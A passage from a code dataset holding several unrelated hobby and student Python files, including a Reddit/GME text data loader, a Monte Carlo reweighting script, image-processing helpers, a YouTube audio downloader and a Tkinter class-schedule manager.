perc)\n\t\t\tscore_percentiles.append(s_perc)\n\t\t\tcomment_percentiles.append(c_perc)\n\t\t\tfunc_percentiles.append(f_perc)\n\n\t\tself.score_percentiles = score_percentiles\n\t\tself.comment_percentiles = comment_percentiles\n\t\tself.func_percentiles = func_percentiles\n\t\tprint(self.func_percentiles)\n\n\nclass TwitterData():\n\tdef __init__(self, csv_file_path, dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\n\t\trows = self.dataframe.shape[0]\n\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(self.dataframe))):\n\t\t\trow = self.dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\tif len(wordlist) == 0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\tY.append(row[1])\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\nclass WSBDataLarge():\n\tdef __init__(self, csv_file_path, dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\t\trows = self.dataframe.shape[0]\n\n\t\tstock_df = pd.read_csv(\"../data/GME.csv\")\n\t\tself.stock_price(stock_df)\n\n\n\t\tself.dataframe[\"timestamp\"] = pd.to_datetime(self.dataframe[\"timestamp\"], format='%Y-%m-%d %H:%M:%S')\n\n\t\tisBusinessday = BDay().onOffset\n\t\tmatch_series = self.dataframe[\"timestamp\"].map(isBusinessday)\n\t\tself.dataframe = self.dataframe[match_series].copy()\n\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(self.dataframe))):\n\t\t\trow = self.dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\t# wordList = [self.vocab.get_id(w.lower()) for w in word_tokenize(title) if self.vocab.get_id(w.lower()) >= 0]\n\t\t\tif len(wordlist) == 0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\t### Add Y logic\n\n\t\t\treddit_date = row[-1] + timedelta(days=1)\n\t\t\t#reddit_date_mon = row[-1] + timedelta(days=2)\n\t\t\tstr_time = reddit_date.strftime('%m') + '-' + reddit_date.strftime('%d')\n\t\t\t#str_time_mon = reddit_date_mon.strftime('%m') + '-' + reddit_date_mon.strftime('%d')\n\n\n\t\t\t# need to figure out the fix for Friday to Saturday\n\t\t\ttry:\n\t\t\t\tlabel = self.gme_stock_dict[str_time]\n\t\t\t\tY.append(label)\n\t\t\texcept:\n\t\t\t\t#Y.append(self.gme_stock_dict[str_time_mon])\n\t\t\t\tY.append(0)\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\n\tdef stock_price(self, dataframe):\n\t\tdataframe[\"Date\"] = pd.to_datetime(dataframe[\"Date\"], format='%Y-%m-%d %H:%M:%S')\n\t\t# start_date = min(self.dataframe['timestamp']) not working for some reason\n\t\tstart_date = \"2021-01-28 00:00:00\"\n\t\tdf = dataframe[[\"Date\", \"Open\", \"Close\", \"High\"]]\n\t\tdf = df[df[\"Date\"] >= start_date]\n\t\tdf[\"Date_str\"] = df[\"Date\"].dt.strftime('%m') + '-' + df[\"Date\"].dt.strftime('%d')\n\n\t\tdf['Up_Down'] = np.where((df[\"High\"] - df[\"Open\"]) > 0, 1, 0)\n\n\t\tprint(df.head)\n\t\tself.gme_stock_dict = pd.Series(df['Up_Down'].values, index=df.Date_str)\n\n\n\nif __name__ == '__main__':\n\twsb_file_path = \"../data/reddit_wsb.csv\"\n\twsb_data = load_csv(wsb_file_path)\n\tvocab = create_vocab(wsb_data['title'].values)\n\n\tsplit_point = int(len(wsb_data)*0.9)\n\ttrain_df = wsb_data[0:split_point]\n\tdev_df = wsb_data[split_point:]\n\tprint(train_df)\n\n\tprint(\"load train data\")\n\ttrain_data = WSBDataLarge(wsb_file_path, dataframe=train_df, vocab=vocab, train=True)\n\tdev_data = WSBDataLarge(wsb_file_path, dataframe=dev_df, vocab=vocab, train=False)\n\tdev_labels = dev_data.Y\n\tdev_unique, dev_counts = np.unique(dev_labels, return_counts=True)\n\n\tlabels = train_data.Y\n\tunique_labels, counts = np.unique(labels, return_counts=True)\n\tprint(unique_labels)\n\tprint(counts)\n\tplt.figure()\n\tplt.bar(unique_labels, counts)\n\t# plt.hist(labels, bins=5)\n\tplt.title(\"WSB Training Data Derived Class Distribution\")\n\tplt.xlabel(\"Classes\")\n\tplt.ylabel(\"Frequency\")\n\tplt.show()\n\n\tplt.figure(1)\n\tplt.bar(dev_unique, dev_counts)\n\t# plt.hist(labels, bins=5)\n\tplt.title(\"WSB Eval Data Derived Class Distribution\")\n\tplt.xlabel(\"Classes\")\n\tplt.ylabel(\"Frequency\")\n\tplt.show()\n\t# test = WSBDataLarge(\"../data/reddit_data.csv\")\n","repo_name":"ctyler9/natural-language-spring-2021","sub_path":"model/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":12117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"17161748857","text":"#!/usr/bin/env python\nimport os\nimport argparse\nimport json\nimport time\n\nimport numpy as np\n\nfrom libspi.Genome import *\nfrom libspi.MonteCarloSampler import *\nimport libspi.IO as IO\nimport libspi.CommandLineUtils as cli\n\n##############################################################\n# CMD line options parser\n##############################################################\n\n\ndef parse_command_line_options():\n parser = argparse.ArgumentParser(\n description='Monte Carlo reweighting for Cre-Lox Recombination studies.')\n parser.add_argument('--input-file', '-i', type=str,\n help=\"Chromosome file structure. Chromosome is assumed to be circular.\")\n parser.add_argument('--output-file', '-o', type=str,\n required=True, help=\"Output file\")\n parser.add_argument('--trajectory-file', '-t', type=str,\n required=True, help=\"Trajectory file\")\n # parser.add_argument('--config', '-c', type=str, required=True, help=\"Simulation configuration file\")\n parser.add_argument('--lb', type=float, required=True,\n help=\"Lambda parameter\")\n parser.add_argument('--nu', type=float, required=True, help=\"Nu parameter\")\n parser.add_argument('--b', type=float, required=True, help=\"B parameter\")\n parser.add_argument('--rl', type=float, required=True,\n help=\"Reweighting radius for lambda parameter\")\n parser.add_argument('--rnu', type=float, required=True,\n help=\"Reweighting radius for nu parameter\")\n parser.add_argument('--rb', type=float, required=True,\n help=\"Reweighting radius for b parameter\")\n options = parser.parse_args()\n return options\n\n\n##############################################################\n# MAIN method\n##############################################################\nif __name__ == \"__main__\":\n #\n options = parse_command_line_options()\n # config = cli.load_configuration_file(options.config)\n\n # building the parameters grid\n # param_grid = cli.build_parameters_grid(config)\n param_grid = [(options.lb, options.nu, options.b)]\n\n print(\"Using %d parameters settings.\" % len(param_grid))\n\n # creating and loading genome structure file\n genome = Genome()\n genome.load_genome_from_file(options.input_file)\n\n # loading trajectory pool\n trajectory_pool = IO.load_trajectories_from_file(options.trajectory_file)\n filtered_pool = dict()\n\n for curr_param, curr_traj in trajectory_pool.items():\n c_l, c_nu, c_b = curr_param\n if (np.abs(c_l - options.lb) <= options.rl) and \\\n (np.abs(c_nu - options.nu) <= options.rnu) and \\\n (np.abs(c_b - options.b) <= options.rb):\n filtered_pool[curr_param] = curr_traj\n\n print(\"Reweighting using %d simulations.\" % len(filtered_pool.keys()))\n # creating the MC sampler\n mc = ReweightGridMonteCarloSampler(genome)\n\n # running and timing the sampler\n # t_start = time.time()\n trajectory_profile = mc.run(filtered_pool, param_grid)\n # t_elapsed = time.time() - t_start\n\n # saving objects to file\n IO.save_profiles_to_file(\n options.output_file, trajectory_profile, vars(options))\n","repo_name":"stracquadaniolab/spi-nf","sub_path":"bin/spi-reweight.py","file_name":"spi-reweight.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"75069214170","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 08 10:15:52 2016\n\n@author: yimeng\n\"\"\"\n\nimport math, os, cv2, shutil\nimport numpy as np\n\ndef dp(InputCost):\n # dynamic programming \n\n weight_smooth = 2\n edge = np.ones(InputCost.shape[1])\n paths = np.ones(InputCost.shape[0]) \n backtracing = np.ones(InputCost.shape)\n CAM = copy.deepcopy(InputCost) # cost accumulate matrix\n \n for i in range(1, InputCost.shape[1]):\n for j in range(InputCost.shape[0]):\n for k in range(InputCost.shape[0]):\n paths[k] = weight_smooth*np.absolute(j-k) + CAM[k, i-1] + CAM[j, i]\n \n CAM[j,i] = paths.min() \n backtracing[j,i] = paths.argmin()\n \n edge[-1] = CAM[:,-1].argmin()\n \n for i in range(InputCost.shape[1]-2, -1, -1):\n edge[i] = backtracing[int(edge[i+1]), i+1]\n \n return edge\n \ndef openning(inputmatrix, wind_size = (3,3)):\n # mathematical morphology: openning\n \n kernel = np.ones(wind_size, np.uint8)\n erosion = cv2.erode(inputmatrix, kernel)\n dilation = cv2.dilate(erosion, kernel)\n return dilation\n \ndef closing(inputmatrix, wind_size = (3,3)):\n # mathematical morphology: closing\n \n kernel = np.ones(wind_size, np.uint8)\n dilation = cv2.dilate(inputmatrix, kernel)\n erosion = cv2.erode(dilation, kernel)\n return erosion\n \ndef normalize_std(data):\n # standard normalize\n data_mean = data.mean(axis = 0)\n data_std = data.std(axis = 0) \n data_std[data_std == 0] = 1 \n return (data - data_mean)/data_std, data_mean, data_std \n \ndef relativeDistance(inputdata):\n temp_data = np.vstack((inputdata[0], inputdata[1]))\n\n dist = 0\n for i in range(len(inputdata[0])):\n for j in range(len(inputdata[0])):\n if i!= j:\n dist += np.sqrt((temp_data[0,i] - temp_data[0,j])**2 + (temp_data[1,i] - temp_data[1,j])**2)\n \n return dist\n \ndef zeropadding(matrix, padsize1, padsize2, constant_val = 0):\n leftPad,rightPad,topPad,bottomPad = padsize1, padsize1, padsize2, padsize2\n pads = ((leftPad,rightPad),(topPad,bottomPad))\n return np.pad(matrix, pads, 'constant', constant_values = constant_val)\n\ndef NonMaximumSuppression(labelmap,scoremap,suppresssize):\n finallabel = np.zeros((0,4))\n mapshape = np.array([scoremap.shape[0:2]])\n while (scoremap>0).any():\n index = scoremap.argmax()\n index = np.array([index/mapshape[0,1],index%mapshape[0,1]])\n singlelabel = np.array([[labelmap[index[0],index[1]],scoremap[index[0],index[1]],index[0],index[1]]])\n finallabel = np.concatenate((finallabel,singlelabel),0)\n suppressedLoc = np.array([0,0,mapshape[0,0],mapshape[0,1]])\n if index[0]-suppresssize>0:\n suppressedLoc[0] = index[0]-suppresssize\n if index[0]+suppresssize0:\n suppressedLoc[1] = index[1]-suppresssize\n if index[1]+suppresssize 60:\n add_hr += (min_24hr + duration_minutes_org)//60\n duration_hour = duration_hour_org + add_hr\n duration_minutes = (min_24hr + duration_minutes_org) - (add_hr*60)\n else:\n duration_hour = duration_hour_org\n duration_minutes = duration_minutes_org\n \n if (hour_24hr + duration_hour) > 24:\n cal_nextday += (hour_24hr + duration_hour)//24\n \n #Calculate display day of week\n if str(dayofwk).capitalize() in dayofweek:\n next_day = \"\"\n cal_dow = None\n\n if cal_nextday == 0:\n str_nextday = \", \" + str(dayofwk.capitalize())\n else:\n if (dayofweek[str(dayofwk).capitalize()] + cal_nextday) > 7:\n cal_dow = (dayofweek[str(dayofwk).capitalize()] + cal_nextday)%7\n else:\n cal_dow = dayofweek[str(dayofwk).capitalize()] + cal_nextday\n \n next_day = [k for k, v in dayofweek.items() if v == cal_dow][0]\n \n if cal_nextday == 1:\n str_nextday = \", \" + next_day + \" (next day)\"\n else:\n str_nextday = \", \" + next_day + \" (\" + str(cal_nextday) +\" days later)\"\n \n #calculate new_time\n cal_time = start_time + timedelta(minutes=duration_minutes_org, hours=duration_hour_org)\n \n #Show output\n if dayofwk == None:\n if cal_nextday == 1:\n new_time = cal_time.time().strftime('%-I:%M %p') + \" (next day)\"\n elif cal_nextday > 1:\n new_time = cal_time.time().strftime('%-I:%M %p') + \" (\" + str(cal_nextday) + \" days later)\"\n else:\n new_time = cal_time.time().strftime('%-I:%M %p')\n else:\n new_time = str(cal_time.time().strftime('%-I:%M %p')) + str_nextday\n\n return new_time","repo_name":"natthayasp/boilerplate-time-calculator-Public","sub_path":"time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20003935431","text":"def fib(x):\n a=x[0]\n b=x[1]\n for i in range(2,len(x)):\n if x[i]==(a+b):\n a=b\n b=x[i]\n else:\n return False\n return True\n\nn=int(input())\nx=list(map(int,input().split()))\nif len(x)<=2:\n print('no')\nelif fib(x):\n print('yes')\nelse:\n print('no')","repo_name":"Shavukarusasikumar/codemind-python","sub_path":"Fibonacci_array.py","file_name":"Fibonacci_array.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34601607969","text":"#!/usr/bin/env python\nimport re\n\narr = [1, 4, 8, 9, 7, 5]\n\ndef e_arr():\n for i, v in enumerate(arr):\n yield (i, v)\n\nfor i, v in e_arr():\n print(i, v)\n\nmatch = re.search('(?P.*)\\s+(?P.*)', 'paul 12345')\nname = match.group('name')\nphone = match.group('phone')\nprint(name, phone)\n\nm = re.findall('H', 'hHhHH')\nprint(len(m))\n","repo_name":"allred/allred","sub_path":"sketch/sketch.py","file_name":"sketch.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20433189483","text":"from __future__ import unicode_literals\nimport os\nimport os.path\n\nimport youtube_dl\n\nclass DownloaderAPI():\n DOWNLOAD_LOCATION = 'downloads/'\n available_videos = { }\n\n def __init__(self):\n self.ydl_opts = { # options for youtube_dl\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n 'outtmpl': self.DOWNLOAD_LOCATION + '%(id)s.%(ext)s'\n }\n\n # initiliaze the ydlObject\n self.ydl = youtube_dl.YoutubeDL(self.ydl_opts)\n self._populate_entries()\n\n def is_url_valid(self, url):\n try:\n # Get information about the YouTube video/song\n info = self.ydl.extract_info(url, download=False)\n return info['id']\n except:\n # The url does not exists or is wrong!\n return None\n\n def download(self, videoId, url):\n if videoId not in self.available_videos:\n try:\n self.ydl.download([url])\n except: # something went wrong at downloading process!\n raise\n\n filepath = os.path.join( self.DOWNLOAD_LOCATION, videoId + '.mp3' )\n self.available_videos[videoId] = filepath\n\n print(f'Saved video \"{videoId}\" @ \"{filepath}\"')\n else:\n print(f'Video \"{videoId}\" already downloaded!')\n\n def get_filepath(self, videoId):\n return self.available_videos[videoId]\n\n def _populate_entries(self):\n entries = { }\n for p in os.scandir(self.DOWNLOAD_LOCATION):\n if p.is_file():\n videoId = p.name.split('.')[0]\n entries[videoId] = os.path.realpath(p.path)\n\n self.available_videos = entries\n","repo_name":"kkanellis/genrec","sub_path":"web/server/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"14449429926","text":"#!/bin/python3\n\nimport sys\n\n\ndef arithmetic_progression_sum(a0, an, n):\n return (a0 + an) * n >> 1\n\n\ndef calc_sum(maximum, d):\n a0 = d\n\n if d > maximum:\n return 0\n n = maximum // d\n an = n * d\n\n if an == maximum:\n an -= d\n n -= 1\n\n return arithmetic_progression_sum(a0, an, n)\n\n\ndef calc_sum_slow(maximum, d):\n a = 0\n for x in range(d, maximum, d):\n a += x\n return a\n\n\ndef calc_sum_multiples_3_5(n):\n s1 = calc_sum(n, 3)\n s2 = calc_sum(n, 5)\n s3 = calc_sum(n, 15)\n return int(s1 + s2 - s3)\n\n\ndef main():\n t = int(input().strip())\n for a0 in range(t):\n n = int(input().strip())\n print(calc_sum_multiples_3_5(n))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mastergreg/hackerrank","sub_path":"eulerchallenge/euler_001.py","file_name":"euler_001.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19626751790","text":"__author__ = \"alvaro barbeira\"\n\nimport re\nimport os\nimport pandas\n\nr_ = re.compile(\"(.*)_chr([0-9]+)_sb([0-9]+)_reg0.1_ff0.01_by_region.txt.gz\")\nr2_ = re.compile(\"gwas_parsing_(.*)_chr([0-9]+)_sb([0-9]+)_by_region.sh\")\n\n\ndef _r(path, r):\n files = os.listdir(path)\n results = []\n for f in files:\n s = r.search(f)\n results.append((s.group(1), s.group(2), s.group(3)))\n return results\n\ndef _p(results):\n results = pandas.DataFrame(data=results,columns= [\"trait\", \"chromosome\", \"sb\"])\n results[\"k\"] = results.chromosome + \"_\" + results.sb\n g = results[[\"trait\", \"k\"]].groupby(\"trait\").aggregate([\"count\"])\n g= g.reset_index(level=\"trait\", col_level=1)\n g.columns = g.columns.droplevel()\n g = g.sort_values(by=\"count\")\n return g\n\nresults = _r(\"results_summary_imputation\", r_)\nresults = _p(results)\n\njobs = _r(\"old/jobs_summary_imputation/\", r2_)\njobs = _p(jobs)\n#from import embed; embed()","repo_name":"hakyimlab/gtex-miscellaneous-processing","sub_path":"src/misc/_check.py","file_name":"_check.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"2941370429","text":"from tkinter import *\nimport tkinter.ttk as tk\nimport json\n\nBLACK = \"#1C2626\"\nWHITE = \"#FFFFFF\"\nRED = \"#FF0000\"\nPURPLE = \"#552D96\"\nGREEN = \"#00FF00\"\nGRAY = \"#C4C4C4\"\nFONT = \"Poppins\"\n\nclass ManageClass:\n def __init__(self, main_window):\n self.main_window = main_window\n self.search_text = StringVar()\n self.class_text = StringVar()\n self.course_text = StringVar()\n self.lec_text = StringVar()\n self.time_text = StringVar()\n self.search = \"\"\n self.class_name = \"\"\n self.course_name = \"\"\n self.lec_name = \"\"\n self.time_stamp = \"\"\n \n with open(\"../data/class_student.json\", mode=\"r\") as file:\n self.class_dict = json.load(file)\n\n # -------------------------------------------- add class function -------------------------------------------- #\n def callback_add_class(self, *args):\n self.class_name = str(self.class_text.get())\n self.course_name = str(self.course_text.get())\n self.lec_name = str(self.lec_text.get())\n self.time_stamp = str(self.time_text.get())\n\n def vcmd_add_class(self):\n self.class_text.trace_add(\"write\", callback=self.callback_add_class)\n self.course_text.trace_add(\"write\", callback=self.callback_add_class)\n self.lec_text.trace_add(\"write\", callback=self.callback_add_class)\n self.time_text.trace_add(\"write\", callback=self.callback_add_class)\n\n def add_new_schedule(self, *event):\n if len(self.class_name)<=0 or len(self.course_name)<=0 or len(self.lec_name)<=0 or len(self.time_stamp)<=0:\n self.indicator_label.configure(text=\"Please Enter the Field!\", fg=RED)\n return self.add_frame.after(1000, func=self.add_class_schedule)\n\n key_checker = [key for key in self.class_dict]\n if self.class_name in key_checker:\n self.indicator_label.configure(text=\"Class Already Exists!\", fg=RED)\n return self.add_frame.after(1000, func=self.add_class_schedule)\n \n data = {\n \"Subject\": str(self.course_name),\n \"StudentNIM\": [],\n \"Lecturer\": str(self.lec_name),\n \"Time\": str(self.time_stamp),\n \"Session\":{}\n }\n self.class_dict[f\"{self.class_name}\"] = data\n\n with open(\"../data/class_student.json\", mode=\"w\") as file:\n file.write(str(json.dumps(self.class_dict, indent=4, sort_keys=True)))\n\n self.indicator_label.configure(text=\"Class Added!\", fg=GREEN)\n self.add_frame.after(1000, func=self.manage_class)\n\n # -------------------------------------------- add class ui -------------------------------------------- #\n def add_class_schedule(self):\n # --------------- reset page\n for widget in self.main_window.winfo_children():\n widget.destroy()\n\n with open(\"../data/class_student.json\", mode=\"r\") as file:\n self.class_dict = json.load(file)\n \n self.add_frame = Frame(self.main_window, bg=BLACK)\n self.add_frame.grid(column=0, row=0)\n\n # --------------- label add schedule\n add_schedule_label = Label(self.add_frame, text=\"ADD CLASS SCHEDULE\", fg=WHITE, bg=BLACK, font=(FONT, 35, \"bold\"))\n add_schedule_label.grid(column=0, row=0, columnspan=3, pady=(0, 20))\n\n # --------------- class name label and entry\n class_name_label = Label(self.add_frame, text=\"Class Name\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n class_name_label.grid(column=1, row=1, sticky=\"W\")\n\n class_entry = Entry(self.add_frame, textvariable=self.class_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n class_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.class_text.set(\"\")\n class_entry.grid(column=1, row=2, pady=(0, 10), sticky=\"W\")\n\n # --------------- course name label and entry\n course_name_label = Label(self.add_frame, text=\"Course Name\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n course_name_label.grid(column=1, row=3, sticky=\"W\")\n\n course_name_entry = Entry(self.add_frame, textvariable=self.course_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n course_name_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.course_text.set(\"\")\n course_name_entry.grid(column=1, row=4, pady=(0, 10), sticky=\"W\")\n\n # --------------- lecturer name label and entry\n lec_name_label = Label(self.add_frame, text=\"Lecturer\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n lec_name_label.grid(column=1, row=5, sticky=\"W\")\n\n lec_name_entry = Entry(self.add_frame, textvariable=self.lec_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n lec_name_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.lec_text.set(\"\")\n lec_name_entry.grid(column=1, row=6, pady=(0, 10), sticky=\"W\")\n\n # --------------- time label and entry\n time_label = Label(self.add_frame, text=\"Time\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n time_label.grid(column=1, row=7, sticky=\"W\")\n\n time_entry = Entry(self.add_frame, textvariable=self.time_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n time_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.time_text.set(\"\")\n time_entry.grid(column=1, row=8, pady=(0, 10), sticky=\"W\")\n\n # --------------- indicator label\n self.indicator_label = Label(self.add_frame, text=\"\", fg=GREEN, bg=BLACK, font=(FONT, 12, \"bold\"))\n self.indicator_label.grid(column=1, row=9, pady=(50, 50))\n\n # --------------- cancel button\n cancel_button = Button(self.add_frame, text=\"Cancel\", command=self.manage_class, width=14, height=1)\n cancel_button.configure(background=BLACK, fg=WHITE, font=(FONT, 12, \"bold\"))\n cancel_button.grid(column=0, row=10, sticky=\"E\")\n\n # --------------- add new button\n add_new_button = Button(self.add_frame, text=\"Add New\", command=self.add_new_schedule, width=14, height=1)\n add_new_button.configure(background=PURPLE, fg=WHITE, font=(FONT, 12, \"bold\"))\n add_new_button.grid(column=2, row=10, sticky=\"W\")\n\n # --------------- add new enter\n self.main_window.bind(\"\", self.add_new_schedule)\n\n # -------------------------------------------- manage class function -------------------------------------------- #\n def callback_manage_class(self, *args):\n self.search = str(self.search_text.get())\n\n def vcmd_manage_class(self):\n self.search_text.trace_add(\"write\", callback=self.callback_manage_class)\n\n def click_search(self, *args):\n if str(self.search_text.get()) == \"Search...\":\n self.search_text.set(\"\")\n\n def leave_search(self, *args):\n if str(self.search_text.get()) == \"\":\n self.search_text.set(\"Search...\")\n\n def to_menu(self):\n from menu import Menu\n menu_page = Menu(self.main_window)\n menu_page.menu_page()\n\n def class_info(self, *event):\n try:\n select = self.schedule_table.focus()\n class_code = dict(self.schedule_table.item(select))\n class_code = class_code[\"values\"][0]\n\n from view_class_info import ViewClassInfo\n vci = ViewClassInfo(self.main_window, class_code)\n vci.view_class_info()\n except:\n return\n\n # -------------------------------------------- search class ui -------------------------------------------- #\n def search_class(self, *event):\n query = str(self.search)\n selections = []\n for child in self.schedule_table.get_children():\n item = self.schedule_table.item(child)[\"values\"]\n if query.lower() in item[0].lower() or query.lower() in item[1].lower() or query.lower() in item[2].lower():\n selections.append(child)\n\n self.schedule_table.selection_set(selections)\n try:\n self.schedule_table.see(str(selections[0]))\n except:\n pass\n\n # -------------------------------------------- manage class ui -------------------------------------------- #\n def manage_class(self):\n # --------------- reset page\n for widget in self.main_window.winfo_children():\n widget.destroy()\n \n manage_class_frame = Frame(self.main_window, bg=BLACK)\n manage_class_frame.grid(column=0, row=0)\n\n manage_class_label = Label(manage_class_frame, text=\"MANAGE CLASS SCHEDULE\", fg=WHITE, bg=BLACK, font=(FONT, 35, \"bold\"))\n manage_class_label.grid(column=0, row=0, padx=50, columnspan=2)\n\n # --------------- search\n search_bar = Entry(manage_class_frame, width=60, validate=\"focusin\", validatecommand=self.vcmd_manage_class, textvariable=self.search_text)\n self.search_text.set(\"Search...\")\n search_bar.bind(\"\", self.click_search)\n search_bar.bind(\"\", self.leave_search)\n search_bar.configure(background=GRAY, fg=BLACK, font=(FONT, 16))\n search_bar.grid(column=0, row=1, padx=10, pady=10, columnspan=2)\n\n self.main_window.bind(\"\", self.search_class)\n\n # --------------- table page\n table_style = tk.Style()\n table_style.configure(\"Treeview\", font=(\"Poppins\", 12), rowheight=30)\n table_style.configure(\"Treeview.Heading\", font=(\"Poppins\", 12, \"bold\"))\n\n scrollbar = Scrollbar(manage_class_frame, orient=\"vertical\")\n scrollbar.grid(column=1, row=2, sticky=\"NSE\", columnspan=2)\n\n self.schedule_table = tk.Treeview(manage_class_frame, yscrollcommand=scrollbar.set)\n self.schedule_table.grid(column=0, row=2, columnspan=2, sticky=\"W\")\n\n scrollbar.config(command=self.schedule_table.yview)\n\n self.schedule_table[\"columns\"] = (\"Class\", \"Course\", \"Time\")\n self.schedule_table.column(\"#0\", width=0, stretch=NO)\n self.schedule_table.column(\"Class\", anchor=CENTER, width=130, stretch=NO)\n self.schedule_table.column(\"Course\", anchor=CENTER, width=300, stretch=NO)\n self.schedule_table.column(\"Time\", anchor=CENTER, width=300, stretch=NO)\n\n self.schedule_table.heading(\"#0\", text=\"\", anchor=CENTER)\n self.schedule_table.heading(\"Class\", text=\"Class\", anchor=CENTER)\n self.schedule_table.heading(\"Course\", text=\"Course\", anchor=CENTER)\n self.schedule_table.heading(\"Time\", text=\"Time\", anchor=CENTER)\n\n self.main_window.bind(\"\", self.class_info)\n\n counter = 0\n for class_code in self.class_dict:\n subject = self.class_dict[class_code][\"Subject\"]\n time_stamp = self.class_dict[class_code][\"Time\"]\n 